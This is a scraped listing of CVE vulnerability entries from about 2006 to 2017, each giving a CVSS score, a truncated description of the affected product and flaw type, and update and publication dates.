An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
17-02-2017 - 09:06 13-02-2017 - 16:59
CVE-2016-2539 6.8
Cross-site request forgery (CSRF) vulnerability in install_modules.php in ATutor before 2.2.2 allows remote attackers to hijack the authentication of users for requests that upload arbitrary files and execute arbitrary PHP code via vectors involving
15-02-2017 - 08:18 07-02-2017 - 10:59
CVE-2016-6433 9.0
The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary commands via crafted web-application parameters, aka Bug ID CSCva30872.
10-02-2017 - 21:59 06-10-2016 - 06:59
CVE-2016-7400 7.5
Multiple SQL injection vulnerabilities in Exponent CMS before 2.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in an activate_address address controller action, (2) title parameter in a show blog controller acti
09-02-2017 - 17:25 07-02-2017 - 10:59
CVE-2016-6603 5.0
ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to bypass authentication and impersonate arbitrary users via the UserName HTTP header.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6602 5.0
ZOHO WebNMS Framework 5.2 and 5.2 SP1 use a weak obfuscation algorithm to store passwords, which allows context-dependent attackers to obtain cleartext passwords by leveraging access to WEB-INF/conf/securitydbData.xml. NOTE: this issue can be combin
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6601 5.0
Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6600 7.5
Directory traversal vulnerability in the file upload functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to upload and execute arbitrary JSP files via a .. (dot dot) in the fileName parameter to servlets/FileUploadServlet.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-3411 4.3
Cross-site scripting (XSS) vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka bug 103609.
01-02-2017 - 21:59 18-01-2017 - 17:59
CVE-2016-4793 5.0
The clientIp function in CakePHP 3.2.4 and earlier allows remote attackers to spoof their IP via the CLIENT-IP HTTP header.
31-01-2017 - 21:59 23-01-2017 - 16:59
CVE-2017-3248 7.5
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthentic
31-01-2017 - 11:43 27-01-2017 - 17:59
CVE-2014-2045 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the old and new interfaces in Viprinet Multichannel VPN Router 300 allow remote attackers to inject arbitrary web script or HTML via the username when (1) logging in or (2) creating an account in
26-01-2017 - 14:32 20-01-2017 - 10:59
CVE-2016-10045 7.5
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal esca
25-01-2017 - 21:59 30-12-2016 - 14:59
CVE-2016-10033 7.5
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
25-01-2017 - 21:59 30-12-2016 - 14:59
CVE-2016-4010 7.5
Magento CE and EE before 2.0.6 allows remote attackers to conduct PHP objection injection attacks and execute arbitrary PHP code via crafted serialized shopping cart data.
25-01-2017 - 14:41 23-01-2017 - 16:59
CVE-2016-4340 6.5
The impersonate feature in Gitlab 8.7.0, 8.6.0 through 8.6.7, 8.5.0 through 8.5.11, 8.4.0 through 8.4.9, 8.3.0 through 8.3.8, and 8.2.0 through 8.2.4 allows remote authenticated users to "log in" as any other user via unspecified vectors.
25-01-2017 - 08:59 23-01-2017 - 16:59
CVE-2017-5521 4.3
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. Th
23-01-2017 - 14:14 17-01-2017 - 04:59
CVE-2016-6896 5.5
Directory traversal vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress 4.5.3 allows remote authenticated users to cause a denial of service or read certain text files via a .. (dot dot) in the plugi
20-01-2017 - 10:31 18-01-2017 - 16:59
CVE-2016-6283 4.3
Cross-site scripting (XSS) vulnerability in Atlassian Confluence before 5.10.6 allows remote attackers to inject arbitrary web script or HTML via the newFileName parameter to pages/doeditattachment.action.
20-01-2017 - 08:58 18-01-2017 - 17:59
CVE-2016-6897 4.3
Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by
20-01-2017 - 08:58 18-01-2017 - 16:59
CVE-2016-6435 4.0
The web console in Cisco Firepower Management Center 6.0.1 allows remote authenticated users to read arbitrary files via crafted parameters, aka Bug ID CSCva30376.
19-01-2017 - 21:59 06-10-2016 - 06:59
CVE-2009-0441 6.8
PHP remote file inclusion vulnerability in skin_shop/standard/2_view_body/body_default.php in TECHNOTE 7.2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the shop_this_skin_path parameter, a diff
19-01-2017 - 21:59 10-02-2009 - 02:00
CVE-2008-4138 10.0
PHP remote file inclusion vulnerability in skin_shop/standard/3_plugin_twindow/twindow_notice.php in TECHNOTE 7 allows remote attackers to execute arbitrary PHP code via a URL in the shop_this_skin_path parameter.
19-01-2017 - 21:59 24-09-2008 - 01:41
CVE-2016-4806 5.0
Web2py versions 2.14.5 and below was affected by Local File Inclusion vulnerability, which allows a malicious intended user to read/access web server sensitive files.
19-01-2017 - 11:29 11-01-2017 - 11:59
CVE-2016-4808 6.8
Web2py versions 2.14.5 and below was affected by CSRF (Cross Site Request Forgery) vulnerability, which allows an attacker to trick a logged in user to perform some unwanted actions i.e An attacker can trick an victim to disable the installed applica
19-01-2017 - 11:18 11-01-2017 - 11:59
CVE-2017-5487 5.0
wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp
18-01-2017 - 21:59 14-01-2017 - 21:59
CVE-2017-5223 2.1
An issue was discovered in PHPMailer before 5.2.22. PHPMailer's msgHTML method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using
18-01-2017 - 13:20 16-01-2017 - 01:59
CVE-2016-4807 3.5
Web2py versions 2.14.5 and below was affected by Reflected XSS vulnerability, which allows an attacker to perform an XSS attack on logged in user (admin).
11-01-2017 - 15:09 11-01-2017 - 11:59
CVE-2016-0891 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in administrative pages in EMC ViPR SRM before 3.7 allow remote attackers to hijack the authentication of administrators.
10-01-2017 - 23:10 20-04-2016 - 13:59
CVE-2015-4594 7.5
eClinicalWorks Population Health (CCMR) suffers from a session fixation vulnerability. When authenticating a user, the application does not assign a new session ID, making it possible to use an existent session ID.
10-01-2017 - 19:21 10-01-2017 - 10:59
CVE-2015-4591 4.3
eClinicalWorks Population Health (CCMR) suffers from a cross site scripting vulnerability in login.jsp which allows remote unauthenticated users to inject arbitrary javascript via the strMessage parameter.
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2015-4593 6.8
eClinicalWorks Population Health (CCMR) suffers from a cross-site request forgery (CSRF) vulnerability in portalUserService.jsp which allows remote attackers to hijack the authentication of content administrators for requests that could lead to the c
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2015-4592 7.5
eClinicalWorks Population Health (CCMR) suffers from an SQL injection vulnerability in portalUserService.jsp which allows remote authenticated users to inject arbitrary malicious database commands as part of user input.
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2014-8727 6.2
Multiple directory traversal vulnerabilities in F5 BIG-IP before 10.2.2 allow local users with the "Resource Administrator" or "Administrator" role to enumerate and delete arbitrary files via a .. (dot dot) in the name parameter to (1) tmui/Control/j
06-01-2017 - 22:00 17-11-2014 - 11:59
CVE-2014-6271 10.0
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceComman
06-01-2017 - 22:00 24-09-2014 - 14:48
CVE-2014-3857 6.5
Multiple SQL injection vulnerabilities in Kerio Control Statistics in Kerio Control (formerly WinRoute Firewall) before 8.3.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) x_16 or (2) x_17 parameter to print.php.
06-01-2017 - 22:00 03-07-2014 - 10:55
CVE-2014-2513 8.2
EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-u
06-01-2017 - 21:59 08-07-2014 - 07:06
CVE-2014-2399 4.3
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 2.2.2 allows remote attackers to affect integrity via unknown vectors related to Oracle Endeca Information Discovery (Formerly Latitude), a different vulnerab
06-01-2017 - 21:59 15-04-2014 - 21:55
CVE-2013-5528 4.0
Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug I
04-01-2017 - 09:52 10-10-2013 - 23:54
CVE-2016-10074 7.5
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mai
03-01-2017 - 13:56 30-12-2016 - 14:59
CVE-2016-10034 7.5
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently e
03-01-2017 - 13:07 30-12-2016 - 14:59
CVE-2014-8008 6.8
Absolute path traversal vulnerability in the Real-Time Monitoring Tool (RTMT) API in Cisco Unified Communications Manager (CUCM) allows remote authenticated users to read arbitrary files via a full pathname in an API command, aka Bug ID CSCur49414.
02-01-2017 - 21:59 22-01-2015 - 09:01
CVE-2014-6593 4.0
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25; Java SE Embedded 7u71 and 8u6; and JRockit 27.8.4 and 28.3.4 allows remote attackers to affect confidentiality and integrity via vectors related to JSSE.
02-01-2017 - 21:59 21-01-2015 - 10:28
CVE-2015-4127 4.3
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin
30-12-2016 - 21:59 28-05-2015 - 10:59
CVE-2015-4010 6.8
Cross-site request forgery (CSRF) vulnerability in the Encrypted Contact Form plugin before 1.1 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the
30-12-2016 - 21:59 09-06-2015 - 10:59
CVE-2015-2125 4.0
Unspecified vulnerability in HP WebInspect 7.x through 10.4 before 10.4 update 1 allows remote authenticated users to bypass intended access restrictions via unknown vectors.
30-12-2016 - 21:59 07-06-2015 - 14:59
CVE-2015-1833 6.4
XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to
30-12-2016 - 21:59 29-05-2015 - 11:59
CVE-2015-1389 4.3
Cross-site scripting (XSS) vulnerability in Aruba Networks ClearPass Policy Manager (CPPM) before 6.4.5 allows remote attackers to inject arbitrary web script or HTML via the username parameter to tips/tipsLoginSubmit.action.
30-12-2016 - 21:59 28-05-2015 - 10:59
CVE-2013-7349 7.5
Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) news_id parameter to news/send.php, (2) thread_id parameter to posts/edit.php, or (3) user_email parameter to users/password.ph
30-12-2016 - 21:59 31-03-2014 - 23:25
CVE-2013-7316 4.3
Cross-site scripting (XSS) vulnerability in GitLab 6.0 and other versions before 6.5.0 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML file, as demonstrated by README.html.
30-12-2016 - 21:59 24-01-2014 - 10:08
CVE-2013-7274 3.5
Cross-site scripting (XSS) vulnerability in Wallpaper Script 3.5.0082 allows remote authenticated users to inject arbitrary web script or HTML via the title field in a wallpaper file upload.
30-12-2016 - 21:59 08-01-2014 - 10:29
CVE-2013-5640 7.5
Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) answer_id or (2) question_id parameter to polls/vote.php, (3) story_id parameter to comments/add.php or (4) comments/edit.php,
30-12-2016 - 21:59 31-03-2014 - 23:24
CVE-2013-5573 4.3
Cross-site scripting (XSS) vulnerability in the default markup formatter in Jenkins 1.523 allows remote attackers to inject arbitrary web script or HTML via the Description field in the user configuration.
30-12-2016 - 21:59 31-12-2013 - 11:04
CVE-2015-1793 6.4
The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly process X.509 Basic Constraints cA values during identification of alternative certificate chains, which allows remote attackers t
27-12-2016 - 21:59 09-07-2015 - 15:17
CVE-2015-5161 6.8
The Zend_Xml_Security::scan in ZendXml before 1.0.1 and Zend Framework before 1.12.14, 2.x before 2.4.6, and 2.5.x before 2.5.2, when running under PHP-FPM in a threaded environment, allows remote attackers to bypass security checks and conduct XML e
23-12-2016 - 21:59 25-08-2015 - 13:59
CVE-2014-2962 7.8
Absolute path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
23-12-2016 - 21:59 19-06-2014 - 06:50
CVE-2016-7065 6.5
The JMX servlet in Red Hat JBoss Enterprise Application Platform (EAP) 4 and 5 allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object.
22-12-2016 - 21:59 13-10-2016 - 10:59
CVE-2016-9838 5.0
An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account an
22-12-2016 - 11:27 16-12-2016 - 04:59
CVE-2016-0492 6.4
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Load Testing fo
22-12-2016 - 09:39 20-01-2016 - 22:00
CVE-2016-0491 6.4
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect integrity and availability via unknown vectors related to Load Testing for W
22-12-2016 - 09:38 20-01-2016 - 22:00
CVE-2016-1000123 7.5
Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
22-12-2016 - 09:21 06-10-2016 - 10:59
CVE-2015-7235 7.5
Multiple SQL injection vulnerabilities in dex_reservations.php in the CP Reservation Calendar plugin before 1.1.7 for WordPress allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in a dex_reservations_calendar_load2 act
21-12-2016 - 22:00 17-09-2015 - 12:59
CVE-2015-6973 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Ignite Realtime Openfire 3.10.2 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via a crafted request to user-password.jsp, (2
21-12-2016 - 22:00 16-09-2015 - 15:59
CVE-2015-6962 7.5
SQL injection vulnerability in the web application in Farol allows remote attackers to execute arbitrary SQL commands via the email parameter to tkmonitor/estrutura/login/Login.actions.php.
21-12-2016 - 22:00 17-09-2015 - 11:59
CVE-2015-6827 6.8
Cross-site request forgery (CSRF) vulnerability in Auto-Exchanger 5.1.0 allows remote attackers to hijack the authentication of users for requests that change a password via a request to signup.php.
21-12-2016 - 22:00 11-09-2015 - 11:59
CVE-2015-6805 3.5
Cross-site scripting (XSS) vulnerability in the MDC Private Message plugin 1.0.0 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the message field in a private message.
21-12-2016 - 22:00 02-09-2015 - 10:59
CVE-2015-6655 6.8
Cross-site request forgery (CSRF) vulnerability in Pligg CMS 2.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator via a request to admin/admin_users.php.
21-12-2016 - 22:00 31-08-2015 - 15:59
CVE-2015-6545 6.8
Cross-site request forgery (CSRF) vulnerability in ajax.php in Cerb before 7.0.4 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a saveWorkerPeek action.
21-12-2016 - 22:00 03-09-2015 - 13:59
CVE-2015-2321 4.3
Cross-site scripting (XSS) vulnerability in the Job Manager plugin 0.7.22 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the email field.
21-12-2016 - 21:59 13-08-2015 - 10:59
CVE-2012-6644 4.3
Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to channels.php, (2) collections.php, (3) groups.php, or (4) videos.php; (5) query parameter
21-12-2016 - 21:59 08-04-2014 - 10:22
CVE-2016-5740 4.3
An issue was discovered in Open-Xchange OX App Suite before 7.8.2-rev5. JavaScript code can be used as part of ical attachments within scheduling E-Mails. This content, for example an appointment's location, will be presented to the user at the E-Mai
16-12-2016 - 14:24 15-12-2016 - 01:59
CVE-2016-6851 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2016-6853 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get ex
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2016-6854 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature. Malicious script code can be executed within a user's context. This can
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2015-6522 7.5
SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the size parameter to get_album_item.php.
09-12-2016 - 09:29 19-08-2015 - 11:59
CVE-2015-7387 7.5
ZOHO ManageEngine EventLog Analyzer 10.6 build 10060 and earlier allows remote attackers to bypass intended restrictions and execute arbitrary SQL commands via an allowed query followed by a disallowed one in the query parameter to event/runQuery.do,
07-12-2016 - 22:13 28-09-2015 - 11:59
CVE-2015-5531 5.0
Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
07-12-2016 - 22:10 17-08-2015 - 11:59
CVE-2015-5075 6.8
Cross-site request forgery (CSRF) vulnerability in X2Engine X2CRM before 5.2 allows remote attackers to hijack the authentication of administrators for requests that create an administrative account via a crafted request to index.php/users/create.
07-12-2016 - 22:09 29-09-2015 - 15:59
CVE-2015-5074 7.5
Incomplete blacklist vulnerability in the FileUploadsFilter class in protected/components/filters/FileUploadsFilter.php in X2Engine X2CRM before 5.0.9 allows remote authenticated users to execute arbitrary PHP code by uploading a file with a .pht ext
07-12-2016 - 22:09 29-09-2015 - 15:59
CVE-2008-6740 6.8
PHP remote file inclusion vulnerability in html/admin/modules/plugin_admin.php in HoMaP-CMS 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the _settings[pluginpath] parameter.
07-12-2016 - 22:01 21-04-2009 - 14:30
CVE-2008-5191 7.5
Multiple SQL injection vulnerabilities in SePortal 2.4 allow remote attackers to execute arbitrary SQL commands via the (1) poll_id parameter to poll.php and the (2) sp_id parameter to staticpages.php.
07-12-2016 - 22:01 21-11-2008 - 12:30
CVE-2015-8562 7.5
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
07-12-2016 - 13:28 16-12-2015 - 16:59
CVE-2015-8358 9.0
Directory traversal vulnerability in the bitrix.mpbuilder module before 1.0.12 for Bitrix allows remote administrators to include and execute arbitrary local files via a .. (dot dot) in the element name of the "work" array parameter to admin/bitrix.m
07-12-2016 - 13:27 16-12-2015 - 16:59
CVE-2015-8357 6.5
Directory traversal vulnerability in the bitrix.xscan module before 1.0.4 for Bitrix allows remote authenticated users to rename arbitrary files, and consequently obtain sensitive information or cause a denial of service, via a .. (dot dot) in the fi
07-12-2016 - 13:27 16-12-2015 - 16:59
CVE-2015-7986 7.5
The index server (hdbindexserver) in SAP HANA 1.00.095 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTTP request, aka SAP Security Note 2197428.
07-12-2016 - 13:25 27-10-2015 - 12:59
CVE-2015-7984 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Horde before 5.2.8, Horde Groupware before 5.2.11, and Horde Groupware Webmail Edition before 5.2.11 allow remote attackers to hijack the authentication of administrators for requests that
07-12-2016 - 13:25 19-11-2015 - 15:59
CVE-2015-6018 10.0
The diagnostic-ping implementation on ZyXEL PMG5318-B20A devices with firmware before 1.00(AANC.2)C0 allows remote attackers to execute arbitrary commands via the PingIPAddr parameter.
07-12-2016 - 13:17 31-12-2015 - 00:59
CVE-2015-5999 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the D-Link DIR-816L Wireless Router with firmware before 2.06.B09_BETA allow remote attackers to hijack the authentication of administrators for requests that (1) change the admin password
07-12-2016 - 13:17 18-11-2015 - 11:59
CVE-2015-5603 6.5
The HipChat for JIRA plugin before 6.30.0 for Atlassian JIRA allows remote authenticated users to execute arbitrary Java code via unspecified vectors, related to "Velocity Template Injection Vulnerability."
07-12-2016 - 13:17 21-09-2015 - 15:59
CVE-2015-5534 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Oxwall before 1.8 allow remote attackers to hijack the authentication of administrators for requests that (1) put the website under maintenance via the maintenance_enable parameter or (2)
07-12-2016 - 13:16 02-11-2015 - 14:59
CVE-2015-5354 5.8
Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
07-12-2016 - 13:16 01-07-2015 - 12:59
CVE-2015-5353 7.5
Directory traversal vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tab parameter to admin/.
07-12-2016 - 13:16 01-07-2015 - 12:59
CVE-2015-5149 5.5
Directory traversal vulnerability in Zoho ManageEngine SupportCenter Plus 7.90 allows remote authenticated users to write to arbitrary files via a .. (dot dot) in the component parameter in the Request component to workorder/Attachment.jsp.
07-12-2016 - 13:15 30-06-2015 - 10:59
CVE-2015-5065 5.0
Absolute path traversal vulnerability in proxy.php in the google currency lookup in the Paypal Currency Converter Basic For WooCommerce plugin before 1.4 for WordPress allows remote attackers to read arbitrary files via a full pathname in the requrl
07-12-2016 - 13:15 24-06-2015 - 10:59
CVE-2015-4677 6.8
Cross-site request forgery (CSRF) vulnerability in FiverrScript (aka Fiverr Script) 7.2 allows remote attackers to hijack the authentication of administrators for requests that create a new admin via a request to administrator/admins_create.php.
07-12-2016 - 13:13 19-06-2015 - 10:59
CVE-2015-4659 6.8
Cross-site request forgery (CSRF) vulnerability in ClickHeat 1.14 and earlier allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a config action to index.php.
07-12-2016 - 13:13 18-06-2015 - 14:59
CVE-2015-4460 6.8
Cross-site request forgery (CSRF) vulnerability in SecuritySetting/UserSecurity/UserManagement.aspx in B.A.S C2Box before 4.0.0 (r19171) allows remote attackers to hijack the authentication of administrators for requests that add administrator accoun
07-12-2016 - 13:12 16-07-2015 - 16:59
CVE-2015-4414 5.0
Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
07-12-2016 - 13:12 17-06-2015 - 14:59
CVE-2015-4153 5.0
Directory traversal vulnerability in the zM Ajax Login & Register plugin before 1.1.0 for WordPress allows remote attackers to include and execute arbitrary php files via a relative path in the template parameter in a load_template action to wp-admin
07-12-2016 - 13:11 10-06-2015 - 14:59
CVE-2010-1622 6.0
SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .ja
06-12-2016 - 21:59 21-06-2010 - 12:30
CVE-2014-3120 6.8
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended se
06-12-2016 - 13:13 28-07-2014 - 15:55
CVE-2016-1525 7.8
Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter.
05-12-2016 - 22:07 12-02-2016 - 21:59
CVE-2016-1524 8.3
Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP fi
05-12-2016 - 22:07 12-02-2016 - 21:59
CVE-2016-0956 7.8
The Servlets Post component 2.3.6 in Apache Sling, as used in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0, allows remote attackers to obtain sensitive information via unspecified vectors.
05-12-2016 - 22:06 10-02-2016 - 15:59
CVE-2016-0862 4.0
General Electric (GE) Industrial Solutions UPS SNMP/Web Adapter devices with firmware before 4.8 allow remote authenticated users to obtain sensitive cleartext account information via unspecified vectors.
05-12-2016 - 22:05 05-02-2016 - 06:59
CVE-2016-0861 9.0
General Electric (GE) Industrial Solutions UPS SNMP/Web Adapter devices with firmware before 4.8 allow remote authenticated users to execute arbitrary commands via unspecified vectors.
05-12-2016 - 22:05 05-02-2016 - 06:59
CVE-2015-8770 6.0
Directory traversal vulnerability in the set_skin function in program/include/rcmail_output_html.php in Roundcube before 1.0.8 and 1.1.x before 1.1.4 allows remote authenticated users with certain permissions to read arbitrary files or possibly execu
05-12-2016 - 22:04 29-01-2016 - 14:59
CVE-2015-4137 7.5
SQL injection vulnerability in related.php in Milw0rm Clone Script 1.0 allows remote attackers to execute arbitrary SQL commands via the program parameter.
05-12-2016 - 22:02 29-05-2015 - 10:59
CVE-2015-4119 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in ISPConfig before 3.0.5.4p7 allow remote attackers to hijack the authentication of (1) administrators for requests that create an administrator account via a request to admin/users_edit.php
05-12-2016 - 22:02 15-06-2015 - 11:59
CVE-2015-4118 6.5
SQL injection vulnerability in monitor/show_sys_state.php in ISPConfig before 3.0.5.4p7 allows remote authenticated users with monitor permissions to execute arbitrary SQL commands via the server parameter. NOTE: this can be leveraged by remote atta
05-12-2016 - 22:02 15-06-2015 - 11:59
CVE-2015-4084 4.3
Cross-site scripting (XSS) vulnerability in the Free Counter plugin 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the value_ parameter in a check_stat action to wp-admin/admin-ajax.php.
05-12-2016 - 22:02 28-05-2015 - 10:59
CVE-2015-3624 5.8
Cross-site request forgery (CSRF) vulnerability in Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx in Ektron Content Management System (CMS) before 9.10 SP1 (Build 9.1.0.184.1.120) allows remote attackers to hijack the authentication of content ad
05-12-2016 - 22:01 09-06-2015 - 10:59
CVE-2015-3443 3.5
Cross-site scripting (XSS) vulnerability in the basic dashboard in Thycotic Secret Server 8.6.x, 8.7.x, and 8.8.x before 8.8.000005 allows remote authenticated users to inject arbitrary web script or HTML via a password entry, which is not properly h
05-12-2016 - 22:01 02-07-2015 - 10:59
CVE-2015-3440 4.3
Cross-site scripting (XSS) vulnerability in wp-includes/wp-db.php in WordPress before 4.2.1 allows remote attackers to inject arbitrary web script or HTML via a long comment that is improperly stored because of limitations on the MySQL TEXT data type
05-12-2016 - 22:01 03-08-2015 - 10:59
CVE-2006-5613 7.5
PHP remote file inclusion in Core/core.inc.php in MP3 Streaming DownSampler (mp3SDS) 3.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the fullpath parameter
05-12-2016 - 21:59 30-10-2006 - 20:07
CVE-2006-3928 7.5
PHP remote file inclusion vulnerability in index.php in WMNews 0.2a and earlier allows remote attackers to execute arbitrary PHP code via a URL in the base_datapath parameter.
05-12-2016 - 21:59 31-07-2006 - 17:04
CVE-2016-2279 4.3
Cross-site scripting (XSS) vulnerability in the web server in Rockwell Automation Allen-Bradley CompactLogix 1769-L* before 28.011+ allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
02-12-2016 - 22:24 02-03-2016 - 06:59
CVE-2016-2203 2.1
The management console on Symantec Messaging Gateway (SMG) Appliance devices before 10.6.1 allows local users to discover an encrypted AD password by leveraging certain read privileges.
02-12-2016 - 22:24 22-04-2016 - 14:59
CVE-2016-1910 5.0
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
